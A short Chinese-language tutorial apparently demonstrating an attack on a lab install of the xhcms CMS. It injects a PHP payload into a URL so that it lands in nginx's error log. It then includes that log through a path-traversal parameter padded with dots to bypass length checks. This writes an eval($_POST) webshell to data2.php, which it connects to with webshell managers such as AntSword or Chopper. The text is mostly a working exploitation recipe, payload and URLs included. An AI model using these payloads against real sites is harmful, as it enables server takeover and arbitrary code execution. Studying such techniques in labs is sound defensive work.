错误日志
nginx的默认日志文件是phpstudy/nginx/logs/error.log
apache的日志文件是phpstudy/apache/logs/error.log
一般管理员都不会改的
这里我用的是nginx
演示
进入网站首页
在url后面加上<?php fputs(fopen('data2.php','w'),'<?php eval($_POST[123])?>');?>
或者其他的一句话木马
http://172.16.11.27/xhcms/%3C?php%20fputs(fopen(%27data2.php%27,%27w%27),%27%3C?php%20eval($_POST[123])?%3E%27);?%3E
查看日志文件
http://172.16.11.27/xhcms/?r=../../../nginx/logs/error.log...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
经过代码审计,这里还需要使用.
,路径长度绕过
发现
index.php的同目录下生成了data2.php文件
用蚁剑或者菜刀连接该文件
http://172.16.11.27/xhcms/data2.php
资源下载
至少有一个任意文件包含漏洞的cms 下载链接